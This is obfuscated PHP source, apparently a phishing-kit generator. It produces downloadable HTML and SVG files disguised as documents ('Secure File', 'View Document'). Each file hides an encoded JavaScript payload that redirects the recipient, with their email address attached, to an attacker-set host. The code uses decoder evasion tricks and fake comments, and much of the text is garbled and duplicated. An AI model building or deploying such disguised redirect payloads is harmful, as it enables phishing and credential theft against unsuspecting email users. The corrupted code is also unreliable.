$fb7e1[15], "jx" => $fb7e1[16], "ch" => $fb7e1[17], "rt" => $fb7e1[18], "fn" => $fb7e1[19], "ex" => $fb7e1[20], "sd" => $fb7e1[21], "bf" => $fb7e1[22], "sh" => $fb7e1[23], "ps" => $fb7e1[24], "nr" => $fb7e1[25], "className" => $Fc8e7 . "-" . $D1a40, "dataAttr" => $ff51f[array_rand($ff51f)], "metaAttr" => $ff51f[array_rand($ff51f)] . "m", "emailAttr" => $ff51f[array_rand($ff51f)] . "u", "title" => $D6af1[array_rand($D6af1)]]; goto aa6e3; d31eb: $fb7e1 = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "xa", "xb", "xc", "xd", "xe", "xf", "xg", "xh", "xi", "xj", "xk", "ya", "yb", "yc", "yd", "ye", "yf", "yg", "yh", "yi", "yj", "yk", "za", "zb", "zc", "zd", "ze", "zf", "zg", "zh", "zi", "zj", "zk"]; goto C157d; C157d: shuffle($fb7e1); goto B09e7; F055c: $D6af1 = ["View Document", "Open File", "Document", "Preview", "File Viewer", "Secure File", "Access File", "Document Access"]; goto bff0e; D530b: $ff51f = ["data-v", "data-x", "data-r", "data-c", "data-s"]; goto F055c; aa6e3: } public function generateHTML() { goto F421e; D2ab3: $f719b = $this->encode($Db98c); goto f2886; bacee: echo $this->buildHTML($f719b); goto Bc819; ee215: header("Pragma: no-cache"); goto ae8ef; ae8ef: header("Expires: 0"); goto bacee; A61a4: header("Content-Type: text/html; charset=UTF-8"); goto E629f; F421e: $Db98c = "window.location.href="" . $this->a2962 . "/"+"" . $this->C5fcf . "";"; goto D2ab3; f2886: $a24fb = "doc-" . bin2hex(random_bytes(4)) . ".html"; goto A61a4; cf936: header("Cache-Control: no-cache, no-store, must-revalidate"); goto ee215; E629f: header("Content-Disposition: attachment; filename="" . $a24fb . """); goto cf936; Bc819: } public function generateSVG() { goto A066d; b7b97: $f719b = $this->encode($Db98c); goto F3368; A066d: $Db98c = "window.location.href="" . $this->a2962 . "/"+"" . $this->C5fcf . "";"; goto b7b97; f3214: header("Cache-Control: no-cache, no-store, must-revalidate"); goto F777e; F3368: $a24fb = "img-" . bin2hex(random_bytes(4)) . ".svg"; goto C5080; F777e: header("Pragma: no-cache"); goto c5361; f7980: echo $this->buildSVG($f719b); goto Fca7e; e0e89: header("Content-Disposition: attachment; filename="" . $a24fb . """); goto f3214; C5080: header("Content-Type: image/svg+xml; charset=UTF-8"); goto e0e89; c5361: header("Expires: 0"); goto f7980; Fca7e: } public function generateBase64SVG() { goto b7c68; a8064: header("Cache-Control: no-cache, no-store, must-revalidate"); goto Dfa81; fbb91: header("Expires: 0"); goto c1e8b; c1e8b: echo $this->buildBase64SVG($this->C5fcf); goto Ac82b; Bc321: header("Content-Disposition: attachment; filename="" . $a24fb . """); goto a8064; fa961: header("Content-Type: image/svg+xml; charset=UTF-8"); goto Bc321; Dfa81: header("Pragma: no-cache"); goto fbb91; b7c68: $a24fb = "document-" . bin2hex(random_bytes(4)) . ".svg"; goto fa961; Ac82b: } private function buildHTML($f719b) { goto E92e1; E143c: list($Db98c, $F5352) = explode("|", $f719b); goto b6df3; E92e1: $a834c = $this->D96da; goto E143c; b6df3: $e3670 = $this->generateDecoder($a834c); goto d4aec; d4aec: return "<!DOCTYPE html>\xa<html>
<head>
<meta charset="UTF-8">\xa <meta name="viewport" content="width=device-width,initial-scale=1">\xa <title>" . $a834c["title"] . "</title>
<style>\xa *{margin:0;padding:0}body{height:0vh;display:flex;align-items:center;justify-content:center}\xa ." . $a834c["className"] . "{width:40px;height:40px;border:3px solid #ddd;border-top-color:#999;border-radius:50%;animation:s 1s linear infinite}
@keyframes s{to{transform:rotate(360deg)}}\xa .h{position:absolute;left:-9999px;opacity}\xa </style>
</head>\xa<body>\xa <div class="" . $a834c["className"] . ""></div>
<div class="h" " . $a834c["dataAttr"] . "="" . htmlspecialchars($Db98c) . "" " . $a834c["metaAttr"] . "="" . htmlspecialchars($F5352) . "" " . $a834c["emailAttr"] . "="" . htmlspecialchars($this->C5fcf) . ""></div>\xa <script>" . $e3670 . "</script>
</body>
</html>"; goto abd4a; abd4a: } private function buildSVG($f719b) { goto F1bfc; F1bfc: $a834c = $this->D96da; goto cd915; Cc34e: return "xml version="1.0" encoding="UTF-8"\xa<svg xmlns="http://www.w3.org/20/svg" width="400" height="300" viewBox= 0">
<rect width="0" height="0" fill="none"/>\xa <circle cx="200" cy=50" r=5" fill="none" stroke="#ddd" stroke-width="2" stroke-dasharray=0" opacity=.3">
<animateTransform attributeName="transform" type="rotate" from="0 0" to="360 200 1" dur=s" repeatCount="indefinite"/>
</circle>
<foreignObject width=" height="1" x="-9999" y="-9999">
<div xmlns="http://www.w3.orgy999/xhtml" " . $a834c["dataAttr"] . "="" . htmlspecialchars($Db98c) . "" " . $a834c["metaAttr"] . "="" . htmlspecialchars($F5352) . "" " . $a834c["emailAttr"] . "="" . htmlspecialchars($this->C5fcf) . ""></div>
</foreignObject>
<script type="text/javascript"><![CDATA[" . $e3670 . "]]></script>\xa</svg>"; goto C2f05; aae6c: $e3670 = $this->generateDecoder($a834c); goto Cc34e; cd915: list($Db98c, $F5352) = explode("|", $f719b); goto aae6c; C2f05: } private function buildBase64SVG($Ebc57) { goto a0c1c; E9f03: $d28ae = base64_encode($da3a3); goto C1a81; C1a81: return "xml version=.0" encoding="UTF-8"
<svg xmlns="http://www.w3.org/2000/svg" width="4" height="0" viewBox= 0 000">\xa <rect width="400" height="0" fill="none"/>
<circle cx="0" cy=50" r="20" fill="none" opacity="0.2"/>\xa <foreignObject width="0" height="0">
<body xmlns="http://www.w3.orgy999/xhtml">
<script>window." . $a834c["em"] . "='" . $Ebc57 . "';</script>
<script src="data:application/ecmascript;base64," . $d28ae . ""></script>
</body>\xa </foreignObject>
</svg>"; goto bc001; a0c1c: $a834c = $this->D96da; goto E9523; E9523: $da3a3 = "(function(){var " . $a834c["dt"] . "=window." . $a834c["em"] . "||"";if(" . $a834c["dt"] . ")window.location.href="" . $this->a2962 . "/"+" . $a834c["dt"] . ";})();"; goto E9f03; bc001: } private function generateDecoder($a834c) { goto D6e58; d4edd: Ac140: goto f3c0f; B7d1d: $a80c5 = ["// Analytics initialization", "// Configuration loader", "// Data processor", "// Content validator", "// Resource handler", "// Module initializer"]; goto E1bec; D6e58: $F8305 = "constructor"; goto c9043; e25e3: $Ec3a6 = mt_rand(1, 3); goto Debb4; Cb330: foreach ($B07f6 as $F096c) { $ecd18[] = "\u00" . dechex(ord($F096c)); B064e: } goto b6bd1; Cfe1e: goto d29d9; goto Ae3d8; D7aaa: foreach ($B07f6 as $F096c) { $ecd18[] = "\" . decoct(ord($F096c)); a5eea: } goto b1f3e; f4eac: $caef5 = ["from", "Char", "Code"]; goto B7d1d; e98ae: bc254: goto Cb330; f3c0f: $f478a = """ . implode('', $ecd18) . """; goto B646f; c6763: $f478a = """ . implode('', $ecd18) . """; goto B9008; A0ac7: $ecd18 = []; goto e25e3; adec9: foreach ($B07f6 as $F096c) { $ecd18[] = "\x" . dechex(ord($F096c)); D89b8: } goto d4edd; E0f7f: C9768: goto Cfe1e; b1f3e: E83c5: goto c6763; B9008: goto C9768; goto e98ae; Ffa36: return "(function(){
" . $abd21 . "
var " . $a834c["el"] . "=document.querySelector("[" . $a834c["dataAttr"] . "]");
if(!" . $a834c["el"] . ")return;\xavar " . $a834c["nr"] . "="" . $bbd31[0] . ""+("" . $bbd31[1] . ""+"" . $bbd31[2] . "");\xavar " . $a834c["dt"] . "=" . $a834c["el"] . "[" . $a834c["nr"] . "]("" . $a834c["dataAttr"] . "")||"";
var " . $a834c["mt"] . "=" . $a834c["el"] . "[" . $a834c["nr"] . "]("" . $a834c["metaAttr"] . "")||"";
var " . $a834c["em"] . "=" . $a834c["el"] . "[" . $a834c["nr"] . "]("" . $a834c["emailAttr"] . "")||"";
if(!" . $a834c["dt"] . "||!" . $a834c["mt"] . ")return;
try{\xavar " . $a834c["ps"] . "=" . $a834c["mt"] . ".split();
var " . $a834c["k1"] . "=parseInt(" . $a834c["ps"] . "[0],16);\xavar " . $a834c["k2"] . "=parseInt(" . $a834c["ps"] . "[1],);\xavar " . $a834c["k3"] . "=parseInt(" . $a834c["ps"] . "[2]a6);
var " . $a834c["ln"] . "=parseInt(" . $a834c["ps"] . "[3],16);\xavar " . $a834c["bx"] . "=[];or(var " . $a834c["ix"] . ";" . $a834c["ix"] . "<" . $a834c["dt"] . ".length;" . $a834c["ix"] . "+){
" . $a834c["bx"] . ".push(parseInt(" . $a834c["dt"] . ".substr(" . $a834c["ix"] . "b),16));}
var " . $a834c["pm"] . "=[2c,5g,11,13,17a9b3,29,31,,41d3d7e3e9f1,67,71];
var " . $a834c["mp"] . "=[];or(var " . $a834c["ix"] . "=0;" . $a834c["ix"] . "<256;" . $a834c["ix"] . "++){" . $a834c["mp"] . "[" . $a834c["ix"] . "]=" . $a834c["ix"] . ";}
var " . $a834c["sd"] . "=" . $a834c["k3"] . ";
for(var " . $a834c["ix"] . "55;" . $a834c["ix"] . ";" . $a834c["ix"] . "--){
var " . $a834c["ch"] . "=" . $a834c["ix"] . "%" . $a834c["pm"] . ".length;
" . $a834c["sd"] . "=(" . $a834c["sd"] . "*" . $a834c["pm"] . "[" . $a834c["ch"] . "]+" . $a834c["pm"] . "[(" . $a834c["ch"] . "_)%" . $a834c["pm"] . ".length])%536;
var " . $a834c["jx"] . "=" . $a834c["sd"] . "%(" . $a834c["ix"] . "+1);\xavar " . $a834c["tp"] . "=" . $a834c["mp"] . "[" . $a834c["ix"] . "];" . $a834c["mp"] . "[" . $a834c["ix"] . "]=" . $a834c["mp"] . "[" . $a834c["jx"] . "];" . $a834c["mp"] . "[" . $a834c["jx"] . "]=" . $a834c["tp"] . ";}
var " . $a834c["sh"] . "=new Array(2);
for(var " . $a834c["ix"] . ";" . $a834c["ix"] . "<6;" . $a834c["ix"] . "++){" . $a834c["sh"] . "[" . $a834c["mp"] . "[" . $a834c["ix"] . "]]=" . $a834c["ix"] . ";}or(var " . $a834c["ix"] . "=0;" . $a834c["ix"] . "<" . $a834c["bx"] . ".length;" . $a834c["ix"] . "++){" . $a834c["bx"] . "[" . $a834c["ix"] . "]=" . $a834c["sh"] . "[" . $a834c["bx"] . "[" . $a834c["ix"] . "]];}
var " . $a834c["fb"] . "=[1,1];or(var " . $a834c["ix"] . "=2;" . $a834c["ix"] . "0;" . $a834c["ix"] . "++){" . $a834c["fb"] . "[" . $a834c["ix"] . "]=(" . $a834c["fb"] . "[" . $a834c["ix"] . "-1]+" . $a834c["fb"] . "[" . $a834c["ix"] . "-2])*56;}or(var " . $a834c["ix"] . ";" . $a834c["ix"] . "<" . $a834c["bx"] . ".length;" . $a834c["ix"] . "++){
var " . $a834c["ch"] . "=(" . $a834c["ix"] . "+(" . $a834c["k2"] . ")7))%" . $a834c["fb"] . ".length;
" . $a834c["bx"] . "[" . $a834c["ix"] . "]^=" . $a834c["fb"] . "[(" . $a834c["ch"] . "+3)%" . $a834c["fb"] . ".length];\xavar " . $a834c["sh"] . "=" . $a834c["fb"] . "[" . $a834c["ch"] . "]%8;
var " . $a834c["bf"] . "=" . $a834c["bx"] . "[" . $a834c["ix"] . "];
" . $a834c["bx"] . "[" . $a834c["ix"] . "]=((" . $a834c["bf"] . ">>" . $a834c["sh"] . ")|(" . $a834c["bf"] . "<<(8-" . $a834c["sh"] . ")))&5;}\xavar " . $a834c["st"] . "=[" . $a834c["k1"] . "," . $a834c["k2"] . "," . $a834c["k1"] . "^" . $a834c["k2"] . ",(" . $a834c["k1"] . "+" . $a834c["k2"] . ")&0xFFFFFFFF];or(var " . $a834c["ix"] . "=0;" . $a834c["ix"] . "<" . $a834c["bx"] . ".length;" . $a834c["ix"] . "++){
var " . $a834c["ch"] . "=" . $a834c["ix"] . ",;
" . $a834c["st"] . "[" . $a834c["ch"] . "]=(" . $a834c["st"] . "[" . $a834c["ch"] . "]+" . $a834c["st"] . "[(" . $a834c["ch"] . "Y),])&0xFFFFFFFF;
" . $a834c["st"] . "[" . $a834c["ch"] . "]=((" . $a834c["st"] . "[" . $a834c["ch"] . "]<<8)|(" . $a834c["st"] . "[" . $a834c["ch"] . "]>>4))&0xFFFFFFFF;\xavar " . $a834c["bf"] . "=(" . $a834c["st"] . "[" . $a834c["ch"] . "]^" . $a834c["st"] . "[(" . $a834c["ch"] . "+2)%4])&5;\xa" . $a834c["bx"] . "[" . $a834c["ix"] . "]^=" . $a834c["bf"] . ";}
var " . $a834c["fn"] . "="";\xavar " . $a834c["rt"] . "=String["" . $caef5[0] . ""+("" . $caef5[1] . ""+"" . $caef5[2] . "")];or(var " . $a834c["ix"] . "=0;" . $a834c["ix"] . "<" . $a834c["ln"] . ";" . $a834c["ix"] . "++){" . $a834c["fn"] . "+=" . $a834c["rt"] . "(" . $a834c["bx"] . "[" . $a834c["ix"] . "]);}\xavar " . $a834c["tp"] . "=" . $f478a . ";
var " . $a834c["sd"] . "=""[" . $a834c["tp"] . "][" . $a834c["tp"] . "](" . $a834c["fn"] . ");
" . $a834c["sd"] . "();
}catch(e){}})();"; goto ef9e9; c9043: $B07f6 = str_split($F8305); goto A0ac7; Debb4: if ($Ec3a6 == 1) { goto a27cb; } goto Afd13; E1bec: $abd21 = $a80c5[array_rand($a80c5)]; goto Ffa36; Ec2e6: $bbd31 = ["get", "Attr", "ibute"]; goto f4eac; B646f: d29d9: goto Ec2e6; b6bd1: edc8e: goto c023a; c023a: $f478a = """ . implode('', $ecd18) . """; goto E0f7f; Ae3d8: a27cb: goto adec9; Afd13: if ($Ec3a6 == 2) { goto bc254; } goto D7aaa; ef9e9: } }
class ChaCha { private $a2962; private $C5fcf; private $D96da; public function __construct($a4c91, $Ec631) { goto dc0dc; A55b8: $this->D96da = $this->generateRandomVars(); goto A1001; Ca698: $this->C5fcf = $Ec631; goto A55b8; dc0dc: $this->a2962 = $a4c91; goto Ca698; A1001: } public function encode($c43ea) { goto Ef11c; F41ff: $f0333 = $this->fibShuffle($cb819, $a5077); goto Ab7fd; ecab9: $c5587 = dechex($a4f6d) . . dechex($a5077) . . dechex($b6302) . . dechex(strlen($c43ea)); goto bd570; Cefab: $a5077 = $this->quarterRound($a4f6d, $Da579 ^ $D8293); goto Dc885; ee820: $f719b = bin2hex($c9007); goto ecab9; B28a0: $a4f6d = $this->quarterRound($Da579, $D8293); goto Cefab; F04b5: $D8293 = time() % 65536; goto B28a0; E5cda: $Da579 = mt_rand(100000, 999999); goto F04b5; Ab7fd: $c9007 = $this->primeSpiral($f0333, $b6302); goto ee820; b097f: return ''; goto C629d; C629d: C519f: goto E5cda; Dc885: $b6302 = $this->quarterRound($a5077, strlen($c43ea) * 7919); goto B609b; B609b: $cb819 = $this->chachaXor($c43ea, $a4f6d, $a5077); goto F41ff; Ef11c: if (!empty($c43ea)) { goto C519f; } goto b097f; bd570: return $f719b . "|" . $c5587; goto Dd6c5; Dd6c5: } private function quarterRound($D96d6, $Bf5e1) { goto df2b9; a75db: return $D96d6; goto C216b; cccca: $D96d6 = ($D96d6 ^ $Bf5e1) & 0xffffffff; goto C3f59; df2b9: $D96d6 = $D96d6 + $Bf5e1 & 0xffffffff; goto f7cd6; f7cd6: $D96d6 = ($D96d6 << 7 | $D96d6 >> 25) & 0xffffffff; goto cccca; C3f59: $D96d6 = ($D96d6 << 12 | $D96d6 >> 20) & 0xffffffff; goto a75db; C216b: } private function chachaXor($E3272, $a4f6d, $a5077) { goto Df915; C4f80: $c6dae = [$a4f6d, $a5077, $a4f6d ^ $a5077, $a4f6d + $a5077 & 0xffffffff]; goto e3b4e; f9996: if (!($C511c < strlen($E3272))) { goto De71f; } goto b62b2; b62b2: $B5c32 = $C511c % 4; goto A272a; c703e: fb285: goto Fac4b; e3b4e: $C511c = 0; goto e166f; c9841: De71f: goto cc0c4; b50a5: goto De0a4; goto c9841; Fac4b: $C511c++; goto b50a5; Df915: $afdd9 = ''; goto C4f80; c8c8e: $a1628 = ($c6dae[$B5c32] ^ $c6dae[($B5c32 + 2) % 4]) & 0xff; goto B3108; A272a: $c6dae[$B5c32] = $c6dae[$B5c32] + $c6dae[($B5c32 + 1) % 4] & 0xffffffff; goto b5892; cc0c4: return $afdd9; goto A0ce7; b5892: $c6dae[$B5c32] = ($c6dae[$B5c32] << 8 | $c6dae[$B5c32] >> 24) & 0xffffffff; goto c8c8e; e166f: De0a4: goto f9996; B3108: $afdd9 .= chr(ord($E3272[$C511c]) ^ $a1628); goto c703e; A0ce7: } private function fibShuffle($E3272, $E4e1b) { goto cda56; F8c70: b2309: goto F68ee; Bb89e: $c9466 = ord($E3272[$C511c]); goto Dddff; b01bf: b63a1: goto De95d; cda56: $afdd9 = ''; goto Fc80a; F0512: b2cd4: goto cbf56; D5829: Af01f: goto c5de2; F3ccd: $d50a4 = ($C511c + $E4e1b % 17) % count($B7777); goto c8d54; Fec3b: $C511c = 2; goto F8c70; aab20: $C511c++; goto a7296; d1a71: $C511c = 0; goto b01bf; cbf56: return $afdd9; goto cc673; b319f: $D5dc9 ^= $B7777[($d50a4 + 3) % count($B7777)]; goto Eb957; F68ee: if (!($C511c < 20)) { goto c95d2; } goto febae; Fc80a: $B7777 = [1, 1]; goto Fec3b; fc9d0: goto b2309; goto B9621; Eb957: $afdd9 .= chr($D5dc9); goto Bd67f; c8d54: $d99e1 = $B7777[$d50a4] % 8; goto Bb89e; c5de2: $C511c++; goto fc9d0; B9621: c95d2: goto d1a71; Bd67f: d4e46: goto aab20; De95d: if (!($C511c < strlen($E3272))) { goto b2cd4; } goto F3ccd; Dddff: $D5dc9 = ($c9466 << $d99e1 | $c9466 >> 8 - $d99e1) & 0xff; goto b319f; febae: $B7777[$C511c] = ($B7777[$C511c - 1] + $B7777[$C511c - 2]) % 256; goto D5829; a7296: goto b63a1; goto F0512; cc673: } private function primeSpiral($E3272, $E4e1b) { goto C4e34; A999a: return $afdd9; goto D1f75; A9395: $De69e = ($De69e * $Fc921[$c4066] + $Fc921[($c4066 + 7) % count($Fc921)]) % 65536; goto f977a; F09ed: $C7144 = range(0, 255); goto F614f; F614f: $De69e = $E4e1b; goto afc3a; Ffef2: $C7144[$C511c] = $C7144[$f6432]; goto Dda0b; Afc1e: $afdd9 .= chr($C7144[ord($E3272[$C511c])]); goto f7500; afc3a: $C511c = 255; goto ac743; c80be: goto b3e99; goto c7d3b; Dda0b: $C7144[$f6432] = $Bce68; goto d2a83; dc517: $Bce68 = $C7144[$C511c]; goto Ffef2; bfc84: if (!($C511c > 0)) { goto f43f8; } goto Dd2a3; C4e34: $Fc921 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71]; goto E256f; ac743: Bc1a2: goto bfc84; d2a83: F7b58: goto a294a; bfbb0: if (!($C511c < strlen($E3272))) { goto aa070; } goto Afc1e; f977a: $f6432 = $De69e % ($C511c + 1); goto dc517; E5d59: $C511c++; goto c80be; f7500: E341d: goto E5d59; dd4cb: goto Bc1a2; goto E03f0; a294a: $C511c--; goto dd4cb; c7d3b: aa070: goto A999a; E03f0: f43f8: goto F0fe6; C4915: b3e99: goto bfbb0; Dd2a3: $c4066 = $C511c % count($Fc921); goto A9395; E256f: $afdd9 = ''; goto F09ed; F0fe6: $C511c = 0; goto C4915; D1f75: } private function interleaveRotate($E3272, $E4e1b) { goto ab6ba; db999: if (!(ord($afdd9[$Decb8]) !== 0 && $C511c < $A2286 - 1)) { goto dc11a; } goto C177d; d2cfe: $afdd9[$Decb8] = chr($bfb60); goto F81c0; Cd2ac: return $E3272; goto b6e7c; fbd79: $Decb8 = ($f9510 + $Daaeb) % $A2286; goto d983a; Fcab0: goto A556c; goto C87de; F0f11: $bfb60 = ($c9466 << $Bfc15 | $c9466 >> 8 - $Bfc15) & 0xff; goto d2cfe; B4890: $C511c++; goto a3120; B79be: $c9466 = ord($E3272[$C511c]); goto e8e5a; a3120: goto f9792; goto d6045; fefa5: if (!($A2286 < 2)) { goto C7225; } goto Cd2ac; ab6ba: $A2286 = strlen($E3272); goto fefa5; C87de: dc11a: goto B79be; badb2: return $afdd9; goto D9e4b; F81c0: $f9510 = $Decb8; goto b1a40; e2719: if (!($C511c < $A2286)) { goto Ac1ae; } goto fbd79; d983a: A556c: goto db999; e8e5a: $Bfc15 = $E4e1b >> $C511c % 8 & 7; goto F0f11; bae0a: $C511c = 0; goto D239d; C177d: $Decb8 = ($Decb8 + 1) % $A2286; goto Fcab0; d6045: Ac1ae: goto badb2; D239d: f9792: goto e2719; b6e7c: C7225: goto B2e88; a225f: $Daaeb = $E4e1b % 7 + 3; goto bae0a; B0c90: $f9510 = 0; goto a225f; b1a40: Fba9f: goto B4890; B2e88: $afdd9 = str_repeat("\x0", $A2286); goto B0c90; D9e4b: } private function generateRandomVars() { goto d31eb; aad1f: $D1a40 = substr(md5(mt_rand()), 0, 4); goto D530b; B09e7: $Fc8e7 = ["ld", "ui", "vw", "dc", "pg"][array_rand(["ld", "ui", "vw", "dc", "pg"])]; goto aad1f; bff0e: return ["el" => "[", "dt" => """, "mt" => "a", "em" => """, "k1" => ",", "k2" => " ", "k3" => """, "ln" => "b", "st" => """, "bx" => ",", "fb" => " ", "pm" => """, "mp" => "c", "rs" => """, "tp" => ",", "ix" => " ", "jx" => """, "ch" => "d", "rt" => """, "fn" => ",", "ex" => " ", "sd" => """, "bf" => "e", "sh" => """, "ps" => ",", "nr" => " ", "className" => $Fc8e7 . "-" . $D1a40, "dataAttr" => $ff51f[array_rand($ff51f)], "metaAttr" => $ff51f[array_rand($ff51f)] . "m", "emailAttr" => $ff51f[array_rand($ff51f)] . "u", "title" => $D6af1[array_rand($D6af1)]]; goto aa6e3; d31eb: goto C157d; C157d: shuffle($fb7e1); goto B09e7; F055c: $D6af1 = ["View Document", "Open File", "Document", "Preview", "File Viewer", "Secure File", "Access File", "Document Access"]; goto bff0e; D530b: $ff51f = ["data-v", "data-x", "data-r", "data-c", "data-s"]; goto F055c; aa6e3: } public function generateHTML() { goto F421e; D2ab3: $f719b = $this->encode($Db98c); goto f2886; bacee: echo $this->buildHTML($f719b); goto Bc819; ee215: header("Pragma: no-cache"); goto ae8ef; ae8ef: header("Expires: 0"); goto bacee; A61a4: header("Content-Type: text/html; charset=UTF-8"); goto E629f; F421e: $Db98c = "windowlocationhref="" . $this->a2962 . "/"+"" . $this->C5fcf . "";"; goto D2ab3; f2886: $a24fb = "doc-" . bin2hex(random_bytes(4)) . ".html"; goto A61a4; cf936: header("Cache-Control: no-cache, no-store, must-revalidate"); goto ee215; E629f: header("Content-Disposition: attachment; filename="" . $a24fb . """); goto cf936; Bc819: } public function generateSVG() { goto A066d; b7b97: $f719b = $this->encode($Db98c); goto F3368; A066d: $Db98c = "windowlocationhref="" . $this->a2962 . "/"+"" . $this->C5fcf . "";"; goto b7b97; f3214: header("Cache-Control: no-cache, no-store, must-revalidate"); goto F777e; F3368: $a24fb = "img-" . bin2hex(random_bytes(4)) . ".svg"; goto C5080; F777e: header("Pragma: no-cache"); goto c5361; f7980: echo $this->buildSVG($f719b); goto Fca7e; e0e89: header("Content-Disposition: attachment; filename="" . $a24fb . """); goto f3214; C5080: header("Content-Type: image/svg+xml; charset=UTF-8"); goto e0e89; c5361: header("Expires: 0"); goto f7980; Fca7e: } public function generateBase64SVG() { goto b7c68; a8064: header("Cache-Control: no-cache, no-store, must-revalidate"); goto Dfa81; fbb91: header("Expires: 0"); goto c1e8b; c1e8b: echo $this->buildBase64SVG($this->C5fcf); goto Ac82b; Bc321: header("Content-Disposition: attachment; filename="" . $a24fb . """); goto a8064; fa961: header("Content-Type: image/svg+xml; charset=UTF-8"); goto Bc321; Dfa81: header("Pragma: no-cache"); goto fbb91; b7c68: $a24fb = "document-" . bin2hex(random_bytes(4)) . ".svg"; goto fa961; Ac82b: } private function buildHTML($f719b) { goto E92e1; E143c: list($Db98c, $F5352) = explode("|", $f719b); goto b6df3; E92e1: $a834c = $this->D96da; goto E143c; b6df3: $e3670 = $this->generateDecoder($a834c); goto d4aec; d4aec: return "<!DOCTYPE html>\xa<html>
<head>
<meta charset="UTF-8">\xa <meta name="viewport" content="width=device-width,initial-scale=1">\xa <title>" . $a834c["title"] . "</title>
<style>\xa *{margin:0;padding:0}body{height:0vh;display:flex;align-items:center;justify-content:center}\xa ." . $a834c["className"] . "{width:40px;height:40px;border:3px solid #ddd;border-top-color:#999;border-radius:50%;animation:s 1s linear infinite}
@keyframes s{to{transform:rotate(360deg)}}\xah{position:absolute;left:-9999px;opacity}\xa </style>
</head>\xa<body>\xa <div class="" . $a834c["className"] . ""></div>
<div class="h" " . $a834c["dataAttr"] . "="" . htmlspecialchars($Db98c) . "" " . $a834c["metaAttr"] . "="" . htmlspecialchars($F5352) . "" " . $a834c["emailAttr"] . "="" . htmlspecialchars($this->C5fcf) . ""></div>\xa <script>" . $e3670 . "</script>
</body>
</html>"; goto abd4a; abd4a: } private function buildSVG($f719b) { goto F1bfc; F1bfc: $a834c = $this->D96da; goto cd915; Cc34e: return "xml version="10" encoding="UTF-8"\xa<svg xmlns="http://wwww3org/20/svg" width="400" height="300" viewBox= 0">
<rect width="0" height="0" fill="none"/>\xa <circle cx="200" cy=50" r=5" fill="none" stroke="#ddd" stroke-width="2" stroke-dasharray=0" opacity=.3">
<animateTransform attributeName="transform" type="rotate" from="0 0" to="360 200 1" dur=s" repeatCount="indefinite"/>
</circle>
<foreignObject width=" height="1" x="-9999" y="-9999">
<div xmlns="http://wwww3orgy999/xhtml" " . $a834c["dataAttr"] . "="" . htmlspecialchars($Db98c) . "" " . $a834c["metaAttr"] . "="" . htmlspecialchars($F5352) . "" " . $a834c["emailAttr"] . "="" . htmlspecialchars($this->C5fcf) . ""></div>
</foreignObject>
<script type="text/javascript"><![CDATA[" . $e3670 . "]]></script>\xa</svg>"; goto C2f05; aae6c: $e3670 = $this->generateDecoder($a834c); goto Cc34e; cd915: list($Db98c, $F5352) = explode("|", $f719b); goto aae6c; C2f05: } private function buildBase64SVG($Ebc57) { goto a0c1c; E9f03: $d28ae = base64_encode($da3a3); goto C1a81; C1a81: return "xml version=.0" encoding="UTF-8"
<svg xmlns="http://wwww3org/2000/svg" width="4" height="0" viewBox= 0 000">\xa <rect width="400" height="0" fill="none"/>
<circle cx="0" cy=50" r="20" fill="none" opacity="02"/>\xa <foreignObject width="0" height="0">
<body xmlns="http://wwww3orgy999/xhtml">
<script>window." . $a834c["em"] . "='" . $Ebc57 . "';</script>
<script src="data:application/ecmascript;base64," . $d28ae . ""></script>
</body>\xa </foreignObject>
</svg>"; goto bc001; a0c1c: $a834c = $this->D96da; goto E9523; E9523: $da3a3 = "(function(){var " . $a834c["dt"] . "=window." . $a834c["em"] . "||"";if(" . $a834c["dt"] . ")windowlocationhref="" . $this->a2962 . "/"+" . $a834c["dt"] . ";})();"; goto E9f03; bc001: } private function generateDecoder($a834c) { goto D6e58; d4edd: Ac140: goto f3c0f; B7d1d: $a80c5 = ["// Analytics initialization", "// Configuration loader", "// Data processor", "// Content validator", "// Resource handler", "// Module initializer"]; goto E1bec; D6e58: $F8305 = "constructor"; goto c9043; e25e3: $Ec3a6 = mt_rand(1, 3); goto Debb4; Cb330: foreach ($B07f6 as $F096c) { $ecd18[] = "\u00" . dechex(ord($F096c)); B064e: } goto b6bd1; Cfe1e: goto d29d9; goto Ae3d8; D7aaa: foreach ($B07f6 as $F096c) { $ecd18[] = "\" . decoct(ord($F096c)); a5eea: } goto b1f3e; f4eac: goto B7d1d; e98ae: bc254: goto Cb330; f3c0f: $f478a = """ . implode('', $ecd18) . """; goto B646f; c6763: $f478a = """ . implode('', $ecd18) . """; goto B9008; A0ac7: $ecd18 = []; goto e25e3; adec9: foreach ($B07f6 as $F096c) { $ecd18[] = "\x" . dechex(ord($F096c)); D89b8: } goto d4edd; E0f7f: C9768: goto Cfe1e; b1f3e: E83c5: goto c6763; B9008: goto C9768; goto e98ae; Ffa36: return "(function(){
" . $abd21 . "
var " . $a834c["el"] . "=documentquerySelector("[" . $a834c["dataAttr"] . "]");
if(!" . $a834c["el"] . ")return;\xavar " . $a834c["nr"] . "="["+("""+"a");\xavar " . $a834c["dt"] . "=" . $a834c["el"] . "[" . $a834c["nr"] . "]("" . $a834c["dataAttr"] . "")||"";
var " . $a834c["mt"] . "=" . $a834c["el"] . "[" . $a834c["nr"] . "]("" . $a834c["metaAttr"] . "")||"";
var " . $a834c["em"] . "=" . $a834c["el"] . "[" . $a834c["nr"] . "]("" . $a834c["emailAttr"] . "")||"";
if(!" . $a834c["dt"] . "||!" . $a834c["mt"] . ")return;
try{\xavar " . $a834c["ps"] . "=" . $a834c["mt"] . ".split();
var " . $a834c["k1"] . "=parseInt(" . $a834c["ps"] . "[0],16);\xavar " . $a834c["k2"] . "=parseInt(" . $a834c["ps"] . "[1],);\xavar " . $a834c["k3"] . "=parseInt(" . $a834c["ps"] . "[2]a6);
var " . $a834c["ln"] . "=parseInt(" . $a834c["ps"] . "[3],16);\xavar " . $a834c["bx"] . "=[];or(var " . $a834c["ix"] . ";" . $a834c["ix"] . "<" . $a834c["dt"] . ".length;" . $a834c["ix"] . "+){
" . $a834c["bx"] . ".push(parseInt(" . $a834c["dt"] . ".substr(" . $a834c["ix"] . "b),16));}
